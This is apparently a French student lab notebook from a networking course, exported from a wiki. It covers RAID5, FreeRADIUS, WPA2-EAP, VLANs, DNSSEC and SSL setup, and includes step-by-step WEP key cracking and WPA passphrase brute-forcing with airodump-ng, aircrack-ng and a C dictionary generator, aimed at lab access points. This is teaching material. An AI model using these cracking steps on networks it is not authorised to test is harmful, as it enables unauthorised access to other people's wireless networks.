 root@Ironman:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : Ironman:0  (local to host Ironman)&lt;br /&gt;
           UUID : a82c02d3:4861fdcc:aa9f6f91:45e6f5d9&lt;br /&gt;
         Events : 0&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
On sauvegarde ensuite la configuration de md0 :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier /datamd0 que nous montons sur notre device md0 :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mkfs /dev/md0&lt;br /&gt;
 root@Ironman:~# mkdir /datamd0&lt;br /&gt;
 root@Ironman:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ensuite créer un fichier de test sur le raid 5 (iron-man.txt):&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/datamd0# ls&lt;br /&gt;
 lost+found  test_ironman.txt&lt;br /&gt;
&lt;br /&gt;
On ferme ensuite notre machine, puis nous modifions son fichier .cfg afin qu'elle ne prenne plus en compte la partition xvdd (on commente la ligne). &lt;br /&gt;
Nous relançons ensuite la machine virtuelle, puis nous réaffichons la configuration de md0 :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Thu Dec  8 16:52:21 2016&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Thu Dec  8 17:05:13 2016&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : Ironman:0  (local to host Ironman)&lt;br /&gt;
           UUID : a82c02d3:4861fdcc:aa9f6f91:45e6f5d9&lt;br /&gt;
         Events : 6&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On constate bien que la partion xvdd a été enlevée. Et que le fichier de test sur le raid est toujours présent :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~# ls /datamd0/&lt;br /&gt;
 lost+found  test_ironman.txt&lt;br /&gt;
&lt;br /&gt;
===Création du serveur d'authentification FreeRadius===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons installé le paquet freeradius sur notre machine :&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:~#apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Puis nous modifions le fichier de configuration des utilisateurs de serveur, /etc/freeradius/users, en y ajoutant le notre :&lt;br /&gt;
&lt;br /&gt;
 user_name Cleartext-password := &amp;quot;wanted_pswd&amp;quot;&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite le fichier de configuration des clients, /etc/freeradius/clients.conf, en y ajoutant les différents points où nous connecterons :&lt;br /&gt;
&lt;br /&gt;
 client E304 {&lt;br /&gt;
   ipaddr = 10.60.1.6&lt;br /&gt;
   secret = mdp&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 client E306 {&lt;br /&gt;
   ipaddr = 10.60.1.2&lt;br /&gt;
   secret = mdp&lt;br /&gt;
 }&lt;br /&gt;
 &lt;br /&gt;
 client vlan8 {&lt;br /&gt;
   ipaddr = 10.60.8.0&lt;br /&gt;
   secret = mdp&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Sécurisation wifi par WPA2-EAP===&lt;br /&gt;
&lt;br /&gt;
Nous allons maintenant configurer les points d'accès afin de les rendre accessibles avec nos identifiants et mot de passe configuré sur notre serveur freeRadius. On se connecte à la borne en E306 par exemple :&lt;br /&gt;
&lt;br /&gt;
telnet 10.60.1.2&lt;br /&gt;
&lt;br /&gt;
Puis on passe à la configuration :&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 &lt;br /&gt;
 aaa new-model&lt;br /&gt;
 aaa authentication login eap_ironman group radius_ironman&lt;br /&gt;
 radius-server host 193.48.57.167 auth-port 1812 acct-port 1813 key mot_de_passe&lt;br /&gt;
 aaa group server radius radius_ironman&lt;br /&gt;
 server 193.48.57.167 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 dot11 ssid ironman&lt;br /&gt;
 vlan 8&lt;br /&gt;
 authentication open eap eap_ironman&lt;br /&gt;
 authentication network-eap eap_ironman&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 exit  &lt;br /&gt;
 &lt;br /&gt;
 interface Dot11Radio0&lt;br /&gt;
 encryption vlan 8 mode ciphers aes-ccm tkip&lt;br /&gt;
 ssid ironman&lt;br /&gt;
 exit &lt;br /&gt;
 &lt;br /&gt;
 interface Dot11Radio0.8&lt;br /&gt;
 encapsulation dot1Q 8&lt;br /&gt;
 no ip route-cache&lt;br /&gt;
 bridge-group 8&lt;br /&gt;
 bridge-group 8 subscriber-loop-control&lt;br /&gt;
 bridge-group 8 spanning-disabled&lt;br /&gt;
 bridge-group 8 block-unknown-source&lt;br /&gt;
 no bridge-group 8 source-learning&lt;br /&gt;
 no bridge-group 8 unicast-flooding &lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 interface GigabitEthernet0.8&lt;br /&gt;
 encapsulation dot1Q 8&lt;br /&gt;
 bridge-group 8&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On refait la même chose pour le point d'accès en E304.&lt;br /&gt;
&lt;br /&gt;
===Crackage de clé WEP===&lt;br /&gt;
&lt;br /&gt;
Afin de cracker les clés WEP, nous avons d'abord recherché toutes les points d'accès Wifi disponible autour de nous et possédant une clé WEP.&lt;br /&gt;
Pour cela, nous avons utilisé la commande : airodump-ng --encrypt wep wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH 12 ][ Elapsed: 0 s ][ 2016-03-31 20:22                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:CF:01:94  -74        0        0    0  -1  -1                    PolytechLille                                              &lt;br /&gt;
 04:DA:D2:9C:50:57  -62        1        6    2   2  54e. WEP  WEP         cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -67        2        0    0   2  54e. WEP  WEP         cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -66        1        5    2   2  54e. WEP  WEP         cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -63        1       80   38   2  54e. WEP  WEP         cracotte03                                                  &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        0       24   11   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                                &lt;br /&gt;
 04:DA:D2:9C:50:55  -68        1       14    6   2  54e. WEP  WEP         cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -60        0       73   35   2  -1   WEP  WEP         &amp;lt;length:  0&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:9C:50:51  -63        1       52   25   2  54e. WEP  WEP         cracotte02                                                 &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        1    0   3  54e. WEP  WEP40       Wolverine                                                  &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                            &lt;br /&gt;
                                                                                                                                      &lt;br /&gt;
 04:DA:D2:CF:01:94  00:0C:E7:91:C1:7D  -56    1e- 1e     0       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -68   54e-11e    15        5                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -72   36e- 5e     0        7                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -60   54e-48e    79       81                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:53  00:0F:B5:92:22:68  -64   48e-54e   111       24                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -66    0 -48e   128       13                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -62   54e-54e    92       75                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:51  00:0F:B5:92:24:51  -60   48e-48e    63       53                                                                   &lt;br /&gt;
 (not associated)   9C:2A:83:45:F0:2D  -80    0 - 1      0        1                                                                   &lt;br /&gt;
 (not associated)   8A:1B:9C:B1:EC:8C  -70    0 - 1      5        2                                                                   &lt;br /&gt;
 44:AD:D9:5F:87:00  AC:5F:3E:59:90:D5  -40    0 - 1      0        2&lt;br /&gt;
&lt;br /&gt;
Nous avons choisit de cracker cracotte06. Nous avons créé un fichier de capture (.cap) ciblant cracotte06 grâce à la commande :&lt;br /&gt;
 airodump-ng -w cracotte06 -c 2 --bssid 04:DA:D2:9C:50:55 wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient l'écran suivant :&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 8 s ][ 2016-03-31 20:30                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  -64   0       59      770   64   2  54e. WEP  WEP         cracotte06                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:55  00:0F:B5:92:23:6B  -68    6e-54e  5108      718 &lt;br /&gt;
&lt;br /&gt;
Une fois le fichier de capture créé, nous avons exécuter la commande &lt;br /&gt;
&lt;br /&gt;
 aircrack cracotte06-01.cap&lt;br /&gt;
&lt;br /&gt;
afin débuter le crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant en quelques minutes :&lt;br /&gt;
&lt;br /&gt;
                 [00:01:53] Tested 279622 keys (got 31535 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(44544) A1(39936) 55(39168) BA(38400) E2(37632) &lt;br /&gt;
    1    0/  1   EE(47872) 79(37888) 0E(37120) C0(37120) 37(36864) &lt;br /&gt;
    2    0/  1   EE(43008) 83(40448) 2B(39680) B2(39680) 3F(38912) &lt;br /&gt;
    3    0/  1   EE(46592) 8E(38656) 30(37888) 0A(37120) 86(37120) &lt;br /&gt;
    4    0/  1   EE(46336) C2(39168) 5D(38912) 89(38400) 1B(38144) &lt;br /&gt;
    5    0/  1   EE(50176) CB(41472) C5(39936) 35(39168) 3C(38656) &lt;br /&gt;
    6    0/  1   EE(41216) 0C(39936) AB(37888) B1(37888) DE(37120) &lt;br /&gt;
    7    0/  2   EE(41472) 38(40960) D6(39168) 9F(38400) C4(37888) &lt;br /&gt;
    8    0/  1   EE(39936) 99(38656) 11(38400) FD(38400) E6(37632) &lt;br /&gt;
    9    0/  3   7C(38912) 05(38400) 4C(38400) C1(38144) 22(37888) &lt;br /&gt;
   10    0/  1   D1(38144) 42(37632) 99(37632) 9D(37632) 94(37376) &lt;br /&gt;
   11    1/  1   A0(38912) 2B(38656) 65(37888) E8(37888) A9(37632) &lt;br /&gt;
   12    0/  1   44(43740) 35(38548) A7(38252) 3A(37560) 88(37560) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
La clé a été trouver et sa valeur est &amp;quot;EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44:44&amp;quot;&lt;br /&gt;
&lt;br /&gt;
===Craquage de clé WPA===&lt;br /&gt;
&lt;br /&gt;
Le craquage d'une clé WPA est beaucoup plus long que celui d'une clé WEP car le crack doit effectuer un test sur tout les nombres à 8 chiffres jusqu'à arriver au mot de passe de la borne Wifi. C'est un crack en force brute.&lt;br /&gt;
&lt;br /&gt;
Nous avons donc tout d'abord génerer un fichier texte contenant tout les nombres à 8 chiffres (de 00000000 à 99999999) grâce au petit programme c suivant :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #define MAX_NUM 99999999&lt;br /&gt;
&lt;br /&gt;
 int main(){&lt;br /&gt;
 long chiffre = 0;&lt;br /&gt;
 FILE* fp = NULL;&lt;br /&gt;
 fp = fopen(&amp;quot;dictionnaire.txt&amp;quot;,&amp;quot;a+&amp;quot;);&lt;br /&gt;
 	if (fp != NULL){&lt;br /&gt;
 		for (chiffre=0;chiffre&amp;lt; MAX_NUM + 1;chiffre++)&lt;br /&gt;
 		{&lt;br /&gt;
 		fprintf(fp,&amp;quot;%08li\n&amp;quot;,chiffre);&lt;br /&gt;
 		}&lt;br /&gt;
 	fclose(fp);&lt;br /&gt;
 	}&lt;br /&gt;
 return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
Une fois le dictionnaire généré, on effectue la même commande qu'avec le crackage WEP mais pour les clés WPA : &lt;br /&gt;
&lt;br /&gt;
1. On bascule l'interface wifi en mode monitor :&lt;br /&gt;
 airmon-ng start wlan2&lt;br /&gt;
&lt;br /&gt;
2. On fait un airodump-ng de tout les réseaux possédant un chiffrage WPA :&lt;br /&gt;
 airodump-ng --encrypt WPA wlan2&lt;br /&gt;
&lt;br /&gt;
On obtient le résultat suivant :&lt;br /&gt;
&lt;br /&gt;
 00:19:07:C5:0F:A4  -44        7        8    2   1  54e. WPA2 CCMP   MGT  PolytechLille                                              &lt;br /&gt;
 00:19:07:C5:0F:A2  -48        5        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A5  -48        6        0    0   1  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A3  -50        7        0    0   1  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 00:19:07:C5:0F:A1  -50        7        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A7  -52        6        0    0   1  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 00:19:07:C5:0F:A6  -52        5        0    0   1  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 00:19:07:C5:0F:A0  -54        6        2    0   1  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 00:19:07:C5:0F:A8  -55        5        5    0   1  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:9C:50:53  -62        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte04                                                 &lt;br /&gt;
 04:DA:D2:9C:50:52  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte03                                                 &lt;br /&gt;
 04:DA:D2:9C:50:58  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte09                                                 &lt;br /&gt;
 04:DA:D2:9C:50:50  -66        5        0    0  13  54e. WPA2 CCMP   PSK  cracotte01                                                 &lt;br /&gt;
 04:DA:D2:9C:50:55  -65        6        0    0  13  54e. WPA2 CCMP   PSK  cracotte06                                                 &lt;br /&gt;
 04:DA:D2:9C:50:56  -65        3        0    0  13  54e. WPA2 CCMP   PSK  cracotte07                                                 &lt;br /&gt;
 04:DA:D2:9C:50:59  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte10                                                 &lt;br /&gt;
 04:DA:D2:9C:50:54  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte05                                                 &lt;br /&gt;
 04:DA:D2:9C:50:57  -66        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte08                                                 &lt;br /&gt;
 04:DA:D2:9C:50:51  -67        4        0    0  13  54e. WPA2 CCMP   PSK  cracotte02                                                 &lt;br /&gt;
 04:DA:D2:CF:01:91  -69        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 C8:00:84:84:00:53  -70        3        0    0   9  54e. WPA2 CCMP   PSK  PolytechGuests                                             &lt;br /&gt;
 C8:00:84:84:00:52  -71        4        0    0   9  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:98  -70        2        0    0   5  54e. WPA2 CCMP   MGT  eduroam                                                    &lt;br /&gt;
 04:DA:D2:CF:01:90  -71        3        0    0   5  54e. WPA2 CCMP   MGT  LILLE1                                                     &lt;br /&gt;
 04:DA:D2:CF:01:95  -72        2        0    0   5  54e. WPA2 CCMP   PSK  &amp;lt;length:  1&amp;gt;                                               &lt;br /&gt;
 04:DA:D2:CF:01:97  -72        2        0    0   5  54e. WPA2 CCMP   MGT  PolytechLilleStaff                                         &lt;br /&gt;
 04:DA:D2:CF:01:96  -72        2        0    0   5  54e. WPA2 CCMP   MGT  &amp;lt;length:  1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. Nous décidons de cracker cracotte09, on lance un airodump sur son essid et on effectue une capture &lt;br /&gt;
 &lt;br /&gt;
 airodump-ng -w cracotte09 --encrypt wpa -c 13 -essid cracotte09 wlan05&lt;br /&gt;
&lt;br /&gt;
4. On lance le aircrack avec le fichier de capture et notre dictionnaire généré précédemment :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w dictionnaire.txt cracotte09-01.cap&lt;br /&gt;
&lt;br /&gt;
5. Au bout de 57:55 minutes, nous avons obtenu la clé suivante :&lt;br /&gt;
&lt;br /&gt;
passphrase : 12399909&lt;/div&gt;</summary>
		<author><name>Rruet</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35907</id>
		<title>Cahier 2016 groupe n°7</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B07&amp;diff=35907"/>
				<updated>2016-12-12T10:32:54Z</updated>
		
		<summary type="html">&lt;p&gt;Rruet : /* Sécurisation des données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Cahier des charges==&lt;br /&gt;
&lt;br /&gt;
Mise en réseau des commutateurs 6006 en E304&lt;br /&gt;
&lt;br /&gt;
==Avancement du travail==&lt;br /&gt;
&lt;br /&gt;
===Configuration du 6006===&lt;br /&gt;
&lt;br /&gt;
-Création de 10 VLAN (vlans 2 à 11)pour chacun des 10 groupes du TP sur les ports 4/1 à 4/10 &lt;br /&gt;
&lt;br /&gt;
-Création d'un VLAN (vlan 12) pour les machines virtuelles sur le port 4/11&lt;br /&gt;
&lt;br /&gt;
-Création de 4 ports Trunk sur les ports 4/48, 5/48, 6/48, 7/48 pour respectivement le routeur E304, le routeur E306, le bounding linux et la borne WiFi.&lt;br /&gt;
&lt;br /&gt;
La suite de commande Cisco pour configurer le vlan x avec le nome nameX est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#vlan database&lt;br /&gt;
 3 Switch-E304(vlan)#vlan x name nameX&lt;br /&gt;
 4 Switch-E304(vlan)#exit&lt;br /&gt;
&lt;br /&gt;
La suite de commande pour configurer le port 4/x en mode accès sur le vlan x est la suivante :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface GigabitEthernet 4/x&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport access vlan x&lt;br /&gt;
 6 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 7 Switch-E304(config-if)#end&lt;br /&gt;
 8 Switch-E304#write memory (enregistrer la configuration)&lt;br /&gt;
&lt;br /&gt;
Pour configurer les ports trunk, il suffit de remplacer la ligne 5 précédente par :&lt;br /&gt;
&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
===Installation de xen===&lt;br /&gt;
&lt;br /&gt;
  xen-create-image --hostname=Ironman --ip=193.48.57.167 --netmask=255.255.255.240 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie &lt;br /&gt;
  --dir=/usr/local/xen --gateway=193.48.57.172&lt;br /&gt;
&lt;br /&gt;
===Configuration d'une EtherChannel===&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré une Etherchannel entre notre commutateur et notre routeur. Cela vise à remplacer la liaison trunk simple Gigabit qui les lie déjà, en une liaison 8gigabit. Nous remplacerons donc le port 4/48 par les ports 4/25 à 4/32.&lt;br /&gt;
&lt;br /&gt;
Voici la commande à rentrer dans l'interface de configuration du commutateur :&lt;br /&gt;
&lt;br /&gt;
 1 Switch-E304&amp;gt;enable&lt;br /&gt;
 2 Switch-E304#conf t&lt;br /&gt;
 3 Switch-E304(config)#interface range GigabitEthernet 4/25 - 32&lt;br /&gt;
 4 Switch-E304(config-if)#switchport&lt;br /&gt;
 5 Switch-E304(config-if)#switchport mode trunk&lt;br /&gt;
 6 Switch-E304(config-if)#channel-protocol lacp&lt;br /&gt;
 7 Switch-E304(config-if)#channel-group 1 mode passive&lt;br /&gt;
 8 Switch-E304(config-if)#no shutdown&lt;br /&gt;
 9 Switch-E304(config-if)#end&lt;br /&gt;
 10 Switch-E304#write memory (enregistrer la configuration)  &lt;br /&gt;
&lt;br /&gt;
Pareil dans l'interface de configuration du routeur, sauf que ce sera pour les ports 0/1 à 0/8, et que le channel-group sera en mode active.&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS et DNSSEC avec bind===&lt;br /&gt;
&lt;br /&gt;
La première étape consiste à modifier les informations de notre nom de domaine sur le site de Gandi.&lt;br /&gt;
Il faut alors se diriger sur la rubrique :''Gérer les Glue records''.&lt;br /&gt;
A partir de ce moment là, nous sommes libres de donner les informations suivantes à notre nom de domaine :&lt;br /&gt;
&lt;br /&gt;
'''nom du serveur''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''IP''' : 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
On peut ensuite modifier les serveurs de nom, toujours sur le site de Gandi, dans la rubrique ''modifier les serveurs DNS'' :&lt;br /&gt;
&lt;br /&gt;
'''DNS1''' : ns.bielloumutherfucker.space&lt;br /&gt;
&lt;br /&gt;
'''DNS2''' : ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier ''/etc/bind'' de notre machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
Nous modifions dans un premier temps le fichier ''named.conf.local'' afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;bielloumutherfucker.space&amp;quot; {&lt;br /&gt;
 type master;&lt;br /&gt;
 FIle &amp;quot;/etc/bind/zones/db.bielloumutherfucker.space&amp;quot;;&lt;br /&gt;
 allow-transfer {217.70.177.40; };&lt;br /&gt;
 notify yes;	&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
nous créons ensuite un dossier ''zones'' à l'intérieur duquel nous créons notre fichier de zone ''db.bielloumutherfucker.space'' :&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.bielloumutherfucker.space. root.bielloumutherfucker.space. (&lt;br /&gt;
                    2015102001         ; Serial&lt;br /&gt;
                         86400         ; Refresh&lt;br /&gt;
                          3600         ; Retry&lt;br /&gt;
                       2419200         ; Expire&lt;br /&gt;
                         86400 )       ; Negative Cache TTL&lt;br /&gt;
 &lt;br /&gt;
 @       IN      NS      ns.bielloumutherfucker.space.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.167&lt;br /&gt;
 www     IN      A       193.48.57.167&lt;br /&gt;
 @	IN	A	193.48.57.167&lt;br /&gt;
&lt;br /&gt;
Il nous faut ensuite modifier notre fichier ''/etc/resolv.conf'' afin de passer par notre serveur :&lt;br /&gt;
&lt;br /&gt;
 search bielloumutherfucker.space&lt;br /&gt;
 nameserver 193.48.57.167&lt;br /&gt;
&lt;br /&gt;
A partir de ce moment là, notre serveur DNS est opérationnel. Il nous faut maintenant le sécuriser grâce à DNSSEC.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il nous faut générer les clefs asymétriques KSK et ZSK. Nous entrons alors les commandes suivantes dans le terminal :&lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -f KSK -b 2048 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef KSK&lt;br /&gt;
 dnssec-keygen -a RSASHA1 --b 1024 -r /dev/urandom -n ZONE bielloumutherfucker.space --&amp;gt; clef ZSK&lt;br /&gt;
&lt;br /&gt;
Nous avons maintenant 4 clefs : deux pour chaque type de clef (KSK ou ZSK) avec deux extention différentes (.key pour la clef publique, .private pour la privée).&lt;br /&gt;
&lt;br /&gt;
Après les avoir placé dans le répertoire ''bielloumutherfucker.space.dnssec'' que nous avons crée, on les renomme selon le schéma suivant :&lt;br /&gt;
&lt;br /&gt;
 bielloumutherfucker.space-ksk.key et bielloumutherfucker.space-ksk.private&lt;br /&gt;
 bielloumutherfucker.space-zsk.key et bielloumutherfucker.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
Nous pouvons maintenant signer la zone à l'aide de la commande suivante (depuis le dossier /etc/bind) :&lt;br /&gt;
&lt;br /&gt;
 dnssec-signzone -o bielloumutherfucker.space -k bielloumutherfucker.space-ksk &lt;br /&gt;
 zones/db.bielloumutherfucker.space bielloumutherfucker.space-zsk&lt;br /&gt;
&lt;br /&gt;
Une nouvelle zone, signée, a donc été créée dans notre dossier ''zones''. Il ne nous reste plus qu'à modifier le fichier ''named.conf.local'' en rajoutant un ''.signed'' à la fin du champ File pour notre zone. Nous redémarrons ensuite le serveur bind.&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Nous retournons sur le site de gandi et dans la rubrique ''gérer DNSSEC'' nous ajoutons notre clef publique avec l'algorithme ''RSASHA1''. Une fois la clef ajoutée sur gandi, on peut voir que tous s'est bien passé en faisant un tour sur le site ''Zone Master'', l'attribut DNSSEC est en effet coché et vert.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:dnssec.png]]&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du site via certificat SSL===&lt;br /&gt;
&lt;br /&gt;
Il faut dans un premier temps générer la clefs CSR que nous donnerons à Gandi.&lt;br /&gt;
&lt;br /&gt;
 root@Ironman:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout Ironman.key -out Ironman.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 ..................................................................+++&lt;br /&gt;
 .........................................+++&lt;br /&gt;
 writing new private key to 'Ironman.key'&lt;br /&gt;
 -----&lt;br /&gt;
 You are about to be asked to enter information that will be incorporated&lt;br /&gt;
 into your certificate request.&lt;br /&gt;
 What you are about to enter is what is called a Distinguished Name or a DN.&lt;br /&gt;
 There are quite a few fields but you can leave some blank&lt;br /&gt;
